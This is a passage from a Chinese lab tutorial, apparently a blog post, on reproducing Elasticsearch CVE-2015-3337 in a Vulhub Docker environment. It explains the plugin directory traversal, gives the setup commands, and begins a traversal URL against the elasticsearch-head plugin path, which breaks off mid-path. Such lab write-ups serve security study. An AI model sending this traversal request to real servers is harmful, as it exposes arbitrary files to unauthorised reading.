Vulnhub官方复现教程
https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/
漏洞原理
在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。
复现漏洞
启动环境
https://blog.youkuaiyun.com/JiangBuLiu/article/details/93853056
进入路径为
cd /root/vulhub/elasticsearch/CVE-2015-3337
搭建及运行漏洞环境:
docker-compose build && docker-compose up -d
用时:7分钟
漏洞复现
测试环境默认安装了一个插件:elasticsearch-head
,主页在此:https://github.com/mobz/elasticsearch-head
访问http://your-ip:9200/_plugin/head/../../../../../../../../../e